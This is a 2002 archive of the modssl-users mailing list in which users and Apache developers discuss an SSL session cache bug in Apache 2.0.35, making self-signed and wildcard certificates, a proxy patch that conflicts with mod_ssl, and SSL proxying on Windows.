Message-ID: <20020501215526.GE32460@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <5606C687D4C7D5119A5800508BF30DB401C043F4@mail.rainbow.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C043F4@mail.rainbow.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, May 01, 2002 at 02:37:56PM -0700, Lynn Gazis wrote:
> The shmcb session cache.  Is that the one the fix is for?  If so, I'll try
> it out.

Yes, that is the one - http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_scache_shmcb.c
The next version of apache2 should be tagged in the tree - a new release is
probably not too far away.
> 
> No, for some reason "SSLCryptoDevice cswift" isn't being recognized, in my
> conf file, if I use --enable-rule=SSL_EXPERIMENTAL, but is recognized if I
> go and modify mod_ssl.h directly.
> 
Will adding -DSSL_EXPERIMENTAL to CFLAGS work? There is a bit in the
README file about how it is supposed to work.

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 00:28:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA07368; Thu, 2 May 2002 00:27:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id AAA07304; Thu, 2 May 2002 00:26:23 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g41MOmX12689
	for ; Wed, 1 May 2002 18:24:48 -0400
Date: Wed, 1 May 2002 18:24:48 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: More Apache 2.0.35 testing
In-Reply-To: <20020501215526.GE32460@marvin-lnx.int.tele.dk>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 1 May 2002, Mads Toftum wrote:

> Yes, that is the one -
> http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_scache_shmcb.c
> The next version of apache2 should be tagged in the tree - a new release
> is probably not too far away.

Yep.  SHMCB was totally messed up in 2.0.35.  (SHMHT worked I think.)
Aaron Bannert and I spent some long hours a few evenings ago getting it to
work right.  :)  Anyway, as you say, the change is in for 2.0.36, which is
in final testing and should be released in the next few days.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 05:18:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA24950; Thu, 2 May 2002 05:17:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from apollo.aot.com.au id FAA24901; Thu, 2 May 2002 05:16:29 +0200 (MET DST)
Received: from aot.com.au (hidden-user@gw.aot.com.au [192.168.20.1])
	by apollo.aot.com.au (8.11.0/8.11.0) with ESMTP id g423Qgo14457
	for ; Thu, 2 May 2002 13:26:42 +1000
Received: from GOLD/SpoolDir by aot.com.au (Mercury 1.48);
    2 May 02 13:16:27 +1000
Received: from SpoolDir by GOLD (Mercury 1.48); 2 May 02 13:15:58 +1000
From: "Adrian Bolzan" 
To: modssl-users@modssl.org
Date: Thu, 2 May 2002 13:15:33 +1000
MIME-Version: 1.0
Subject: How to Create a wildcard certificate?
Message-ID: <3CD13BF4.10232.D7F7BD@localhost>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Adrian Bolzan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Are there instructions on the Apache site, or elsewhere, detailing 
how to create a self-signed wildcard certificate?

I have created "host.domain" specific certificates but am not sure 
how to create a wildcard cert.

I have not found any references to this in the mailing lists.

Thanks,

Adrian

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 05:36:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA25958; Thu, 2 May 2002 05:35:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mailer.i3link.com id FAA25913; Thu, 2 May 2002 05:34:03 +0200 (MET DST)
Received: (qmail 18378 invoked by uid 508); 2 May 2002 03:26:23 -0000
Message-ID: <20020502032623.18377.qmail@mailer.i3link.com>
From: keven.jones@i3link.com
To: modssl-users@modssl.org
Subject: Certificate Question
Date: Thu, 02 May 2002 03:26:23 GMT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: keven.jones@i3link.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

All, 

I am new and am wondering the following: 

I have installed openssl. Do I need to buy a cert from verisign/thawte,etc.. 
or can I generate a "free" one using the openssl engine? 

thx
Keven E. Jones
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 08:54:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA08326; Thu, 2 May 2002 08:53:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mailcity.com id IAA08313; Thu, 2 May 2002 08:52:58 +0200 (MET DST)
Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Wed May  1 23:52:44 2002
To: modssl-users@modssl.org
Date: Thu, 02 May 2002 07:52:44 +0100
From: "amel amoula" 
Message-ID: 
Mime-Version: 1.0
X-Sent-Mail: off
X-Mailer: MailCity Service
X-Priority: 3
Subject: Re: Certificate Question
X-Sender-Ip: 213.150.174.152
Organization: Lycos Mail  (http://www.mail.lycos.com:80)
Content-Type: text/plain; charset=us-ascii
Content-Language: en
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "amel amoula" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

 yes you can use openssl for generating a certificate. see www.openssl.org to find a documentation
--

On Thu, 02 May 2002 03:26:23  
 keven.jones wrote:
>All, 
>
>I am new and am wondering the following: 
>
>I have installed openssl. Do I need to buy a cert from verisign/thawte,etc.. 
>or can I generate a "free" one using the openssl engine? 
>
>thx
>Keven E. Jones
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 08:55:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA08375; Thu, 2 May 2002 08:54:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id IAA08325; Thu, 2 May 2002 08:53:06 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id 3525EBD2C; Thu,  2 May 2002 08:54:01 +0200 (CEST)
Date: Thu, 2 May 2002 08:54:01 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: How to Create a wildcard certificate?
Message-ID: <20020502065401.GA1261@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3CD13BF4.10232.D7F7BD@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3CD13BF4.10232.D7F7BD@localhost>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, May 02, 2002 at 01:15:33PM +1000, Adrian Bolzan wrote:
> Hello,
> 
> Are there instructions on the Apache site, or elsewhere, detailing 
> how to create a self-signed wildcard certificate?
> 
> I have created "host.domain" specific certificates but am not sure 
> how to create a wildcard cert.
> 
Wildcard certs are made exactly as any other cert.

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 08:55:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA08378; Thu, 2 May 2002 08:54:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mailcity.com id IAA08328; Thu, 2 May 2002 08:53:19 +0200 (MET DST)
Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Wed May  1 23:53:01 2002
To: modssl-users@modssl.org
Date: Thu, 02 May 2002 07:53:01 +0100
From: "amel amoula" 
Message-ID: 
Mime-Version: 1.0
X-Sent-Mail: off
X-Expiredinmiddle: true
X-Mailer: MailCity Service
X-Priority: 3
Subject: Re: Certificate Question
X-Sender-Ip: 213.150.174.152
Organization: Lycos Mail  (http://www.mail.lycos.com:80)
Content-Type: text/plain; charset=us-ascii
Content-Language: en
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "amel amoula" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

 yes you can use openssl for generating a certificate. see www.openssl.org to find a documentation
--

On Thu, 02 May 2002 03:26:23  
 keven.jones wrote:
>All, 
>
>I am new and am wondering the following: 
>
>I have installed openssl. Do I need to buy a cert from verisign/thawte,etc.. 
>or can I generate a "free" one using the openssl engine? 
>
>thx
>Keven E. Jones
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 08:56:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA08465; Thu, 2 May 2002 08:55:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id IAA08454; Thu, 2 May 2002 08:55:04 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id A72D5BD2C; Thu,  2 May 2002 08:55:57 +0200 (CEST)
Date: Thu, 2 May 2002 08:55:57 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Certificate Question
Message-ID: <20020502065557.GB1261@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <20020502032623.18377.qmail@mailer.i3link.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020502032623.18377.qmail@mailer.i3link.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, May 02, 2002 at 03:26:23AM +0000, keven.jones@i3link.com wrote:
> All, 
> 
> I am new and am wondering the following: 
> 
> I have installed openssl. Do I need to buy a cert from 
> verisign/thawte,etc.. or can I generate a "free" one using the openssl 
> engine? 

Wether you need a "real" certificate or not depends on what you want to
use it for - see also http://www.modssl.org/docs/2.8/ssl_faq.html#cert-dummy

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 09:16:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA10143; Thu, 2 May 2002 09:15:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from apollo.aot.com.au id JAA10067; Thu, 2 May 2002 09:14:34 +0200 (MET DST)
Received: from aot.com.au (hidden-user@gw.aot.com.au [192.168.20.1])
	by apollo.aot.com.au (8.11.0/8.11.0) with ESMTP id g427Omo16566
	for ; Thu, 2 May 2002 17:24:48 +1000
Received: from GOLD/SpoolDir by aot.com.au (Mercury 1.48);
    2 May 02 17:14:31 +1000
Received: from SpoolDir by GOLD (Mercury 1.48); 2 May 02 17:14:11 +1000
From: "Adrian Bolzan" 
To: modssl-users@modssl.org
Date: Thu, 2 May 2002 17:14:02 +1000
MIME-Version: 1.0
Subject: Re: How to Create a wildcard certificate?
Message-ID: <3CD173DB.10116.1B25C2F@localhost>
In-reply-to: <20020502065401.GA1261@marvin-lnx.int.tele.dk>
References: <3CD13BF4.10232.D7F7BD@localhost>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Adrian Bolzan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



On 2 May 2002 at 8:54, Mads Toftum wrote:

> On Thu, May 02, 2002 at 01:15:33PM +1000, Adrian Bolzan wrote:
> > Hello,
> > 
> > Are there instructions on the Apache site, or elsewhere, detailing
> > how to create a self-signed wildcard certificate?
> > 
> > I have created "host.domain" specific certificates but am not sure
> > how to create a wildcard cert.
> > 
> Wildcard certs are made exactly as any other cert.
> 


oh.  ok. ;-)  I did no think i could use the name " *.domain.com" and have 
it work for:
www1.domain.com
www2.domain.com
etc.

thanks,

adrian


> vh
> 
> Mads Toftum
> -- 
> With a rubber duck, one's never alone.
>               -- "The Hitchhiker's Guide to the Galaxy"
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 12:23:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA24396; Thu, 2 May 2002 12:22:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nixpbe.pdb.sbs.de id MAA24368; Thu, 2 May 2002 12:21:33 +0200 (MET DST)
Received: from trulli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.96.20] (may be forged))
	by nixpbe.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g42ALPc19843;
	Thu, 2 May 2002 12:21:25 +0200
Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236])
	by trulli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id MAA22992;
	Thu, 2 May 2002 12:21:23 +0200
Received: (from root@localhost)
	by deejai2.mch.fsc.net (8.12.3/8.12.2) id g42ALORe010003;
	Thu, 2 May 2002 12:21:24 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: from deejai2.mch.fsc.net (localhost [127.0.0.1])
	by deejai2.mch.fsc.net (8.12.3/8.12.3) with ESMTP id g42ALJ2Z009764;
	Thu, 2 May 2002 12:21:19 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: (from martin@localhost)
	by deejai2.mch.fsc.net (8.12.3/8.12.3/Submit) id g42ALINa009686;
	Thu, 2 May 2002 12:21:18 +0200 (CEST)
Date: Thu, 2 May 2002 12:21:18 +0200
From: Martin Kraemer 
To: dev@httpd.apache.org, modssl-users@modssl.org
Subject: [john@cavaliers.org: proxy_http1.1_chunking.patch]
Message-ID: <20020502122118.A599@deejai2.mch.fsc.net>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="6c2NcOVqGQ03X4Wi"
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
X-Operating-System: FreeBSD 4.6-PRERELEASE FreeBSD 4.6-PRERELEASE
X-Organization: Fujitsu Siemens Computers (Muenchen, Germany)
X-Disclaimer: THE COMMENTS CONTAINED IN THIS MESSAGE REFLECT THE VIEWS OF THE  WRITER AND ARE NOT NECESSARILY THE VIEWS OF FUJITSU-SIEMENS COMPUTERS
X-No-Junk-Mail: I do not want to get *any* junk mail.
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Kraemer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--6c2NcOVqGQ03X4Wi
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Ralf, do you have a mod_ssl patch for the current 1.3.25-dev proxy? Or
could you make one?

   Martin
-- 
         |     Fujitsu Siemens
Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730  Munich,  Germany

--6c2NcOVqGQ03X4Wi
Content-Type: message/rfc822
Content-Disposition: inline

Return-Path: 
Received: (from root@localhost)
	by deejai2.mch.fsc.net (8.12.3/8.12.2) id g413f9dk081610
	for martin.kraemer@deejai.mch.fsc.net; Wed, 1 May 2002 05:41:09 +0200 (CEST)
	(envelope-from john@cavaliers.org)
Received: from trulli.pdb.fsc.net (trulli.pdb.fsc.net [172.25.96.20])
	by deejai2.mch.fsc.net (8.12.2/8.12.2av) with ESMTP id g413f5uB081603
	for ; Wed, 1 May 2002 05:41:06 +0200 (CEST)
	(envelope-from john@cavaliers.org)
Received: from pdbrd02e.pdb.fsc.net (pdbrd02e.pdb.fsc.net [172.25.96.15])
	by trulli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id FAA02869
	for ; Wed, 1 May 2002 05:41:04 +0200
Received: by pdbrd02e.pdb.fsc.net with Internet Mail Service (5.5.2653.19)
	id ; Wed, 1 May 2002 05:41:04 +0200
Received: from trolli.pdb.fsc.net ([172.25.97.20]) by pdbrd01e.pdb.fsc.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id J7D7RPVF; Wed, 1 May 2002 05:41:02 +0200
Received: from nixpbe.pdb.sbs.de (nixpbe.pdb.siemens.de [192.109.2.33])
	by trolli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id FAA24825
	for ; Wed, 1 May 2002 05:41:01 +0200
Received: from icarus.apache.org (icarus.apache.org [63.251.56.143])
	by nixpbe.pdb.sbs.de (8.11.2/8.11.2) with SMTP id g413f1c00994
	for ; Wed, 1 May 2002 05:41:01 +0200
Received: (qmail 91201 invoked by uid 1086); 1 May 2002 03:40:44 -0000
Received: (qmail 91192 invoked from network); 1 May 2002 03:40:44 -0000
Received: from daedalus.apache.org (HELO apache.org) (63.251.56.142)
  by icarus.apache.org with SMTP; 1 May 2002 03:40:44 -0000
Received: (qmail 61619 invoked by uid 500); 1 May 2002 03:40:42 -0000
Received: (qmail 61616 invoked from network); 1 May 2002 03:40:41 -0000
Received: from rwcrmhc52.attbi.com (216.148.227.88)
  by daedalus.apache.org with SMTP; 1 May 2002 03:40:41 -0000
Received: from localhost ([66.56.75.17]) by rwcrmhc52.attbi.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20020501034051.CGDN4412.rwcrmhc52.attbi.com@localhost>
          for ; Wed, 1 May 2002 03:40:51 +0000
From: John Ingram 
To: martin@apache.org
Delivered-To: martin@locus.apache.org
Delivered-To: apmail-martin@apache.org
Date: Tue, 30 Apr 2002 23:40:49 -0400
Mime-Version: 1.0 (Apple Message framework v481)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Subject: proxy_http1.1_chunking.patch
Message-Id: <3A541C3A-5CB5-11D6-A13D-000393669C84@cavaliers.org>
X-Pgp-Agent: GPGMail 0.5.2 (v13)
X-Mailer: Apple Mail (2.481)
X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N
X-Spam-Rating: icarus.apache.org 1.6.2 0/1000/N
X-Virus-Scanned: by AMaViS perl-11
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Martin,

Thanks for the patch... I've been pulling my hair out trying to figure out 
what was up with mod_proxy in 1.3.24.  Now my problem is with getting the 
patched 1.3.24 to work with mod_ssl.  If I apply your patch first, and 
then run the mod_ssl configure script on top of that, it behaves 
unexpectedly, but claims to have patched everything it needs to patch.  I 
decided to try it the other way around, by applying mod_ssl to 1.3.24 
before you patch, in which case one of your patch chunks fail.  No matter 
how I try it, I still haven't gotten apache to compile with both.

So, I just went to the source of all good ideas, a smoke break.  It 
suddenly occurred to me that my fastest route to success is just to revert 
back to an earlier version of apache, however I was intrigued by the 
mention of mod_proxy improvements in 1.3.24 in the Announcements file.  So 
I'll probably revert for the short term, but I would probably like to run 
1.3.24, with your patch AND mod_ssl.

Getting to my question (sort of), do the mod_ssl folks know about the 
apache patch, and whose "responsibility" is it to ensure that changes in 
the apache source that affect (particularly popular) third-party modules 
are reported to those module maintainers.  I would guess that it's the 
responsibility of the module maintainers to stay on top of the apache 
source and patches and adjust accordingly.

Anyway, I guess my real question is "do you know about this problem"?  
Please advise how I should proceed.  As I said, in the meantime, I'll go 
to a previous apache version for my ssl-proxying needs.

Thanks,
John Ingram
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (Darwin)
Comment: For info see http://www.gnupg.org

iD8DBQE8z2PG6SpW1ZqzJQ0RAjChAJ4q6Vo8/5Ma4VKq1yv1EGltAjuOIQCgsPZe
yo+GBrjZ0scQ2l1p8M42k4g=
=+cvC
-----END PGP SIGNATURE-----

--6c2NcOVqGQ03X4Wi--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 19:51:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25605; Thu, 2 May 2002 19:50:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA25534; Thu, 2 May 2002 19:49:13 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 43E424CE749; Thu,  2 May 2002 19:49:12 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g42HE5M98201; Thu, 2 May 2002 19:14:05 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailout04.sul.t-online.com id OAA00696; Thu, 2 May 2002 14:01:57 +0200 (MET DST)
Received: from fwd07.sul.t-online.de 
	by mailout04.sul.t-online.com with smtp 
	id 173FHS-0003mL-03; Thu, 02 May 2002 14:01:50 +0200
Received: from web.de (0821523378-0001@[217.233.171.152]) by fwd07.sul.t-online.com
	with esmtp id 173FHH-14MpqiC; Thu, 2 May 2002 14:01:39 +0200
Message-ID: <3CD12AA0.7000105@web.de>
Date: Thu, 02 May 2002 14:01:36 +0200
From: Johann.Bertscheit@t-online.de (Johannes Artur Bertscheit)
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:0.9.4) Gecko/20011019 Netscape6/6.2
X-Accept-Language: de-DE
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache 2.0.36 with mod_ssl and working SSL-ProxyPass for Windows (NT or 2000) ???
References: <3641926.1019913315@[192.168.1.112]> <20020427115347.GB7901@marvin-lnx.int.tele.dk>
Content-Type: multipart/alternative;
 boundary="------------080708080401080508010001"
X-Sender: 0821523378-0001@t-dialin.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Johann.Bertscheit@t-online.de (Johannes Artur Bertscheit)
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------080708080401080508010001
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi all,

I still look for a working Apache 2.0.x with the following properties:
- for Windows (NT or 2000)
- pre-compiled binary or compilable with VC++ 6.0
- mod_ssl enabled
- the right openssl inclulded
- working SSL-ProxyPass (https >> http mapping to map internet SSL to 
intranet non-SSL servers)
(in  reading the mod_ssl mailing list - it seems that all of the above 
points are not working with 2.0.35)

Is it planned to test the next release 2.0.36 on windows / support it 
for windows including SSL-ProxyPass?

Has anyone experience with the Covalent Apache 2.0 (claiming to 
including SSL)(http://www.covalent.net)
Does it have the same bugs as the Apache 2.0.35 or works it for the 
above points?

Thanks in advance.

Johannes

Mads Toftum wrote:

>On Sat, Apr 27, 2002 at 01:15:15PM +0200, Guan Yang wrote:
>
>>I am using Apache 2.0.35 (configured using --enable-ssl 
>>--enable-proxy) and I am having some problems with using ProxyPass 
>>over an SSL-encrypted server.
>>
>ProxyPass is broken for ssl vhosts in Apache 2.0.35 - either use
>the latest cvs version (where this bug has been fixed) or wait 
>for the next Apache2 release.
>


--------------080708080401080508010001
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit





Hi all,



I still look for a working Apache 2.0.x with the following properties:

- for Windows (NT or 2000)

- pre-compiled binary or compilable with VC++ 6.0

- mod_ssl enabled 

- the right openssl inclulded 

- working SSL-ProxyPass (https >> http mapping to map internet SSL
to intranet non-SSL servers)

(in  reading the mod_ssl mailing list - it seems that all of the above points
are not working with 2.0.35)



Is it planned to test the next release 2.0.36 on windows / support it for
windows including SSL-ProxyPass?



Has anyone experience with the Covalent Apache 2.0 (claiming to including
SSL)(http://www.covalent.net)

Does it have the same bugs as the Apache 2.0.35 or works it for the above
points?



Thanks in advance.



Johannes



Mads Toftum wrote:



  
On Sat, Apr 27, 2002 at 01:15:15PM +0200, Guan Yang wrote:

  

    
I am using Apache 2.0.35 (configured using --enable-ssl 
--enable-proxy) and I am having some problems with using ProxyPass 
over an SSL-encrypted server.


    

    
ProxyPass is broken for ssl vhosts in Apache 2.0.35 - either use
the latest cvs version (where this bug has been fixed) or wait 
for the next Apache2 release.


    

    

    
    

--------------080708080401080508010001--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 19:51:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25608; Thu, 2 May 2002 19:50:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA25535; Thu, 2 May 2002 19:49:13 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 788A84CE74F; Thu,  2 May 2002 19:49:12 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g42HEQ698219; Thu, 2 May 2002 19:14:26 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fusion.eons.net id QAA11379; Thu, 2 May 2002 16:31:09 +0200 (MET DST)
Received: from mail.cambrient.co.za ([196.41.18.150] helo=sharp.fm)
	by fusion.eons.net with esmtp (Exim 3.35 #1)
	id 173HbY-0000sq-00; Thu, 02 May 2002 16:30:45 +0200
Message-ID: <3CD14D7D.575761B4@sharp.fm>
Date: Thu, 02 May 2002 16:30:21 +0200
From: Graham Leggett 
X-Mailer: Mozilla 4.73 [en] (X11; I; Linux 2.4.19-pre7 ppc)
X-Accept-Language: en
MIME-Version: 1.0
To: dev@httpd.apache.org
Cc: modssl-users@modssl.org
Subject: Re: [john@cavaliers.org: proxy_http1.1_chunking.patch]
References: <20020502122118.A599@deejai2.mch.fsc.net>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------msD8A87393AF2CD0604ABEFF32"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Graham Leggett 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------msD8A87393AF2CD0604ABEFF32
Content-Type: text/plain; charset=us-ascii
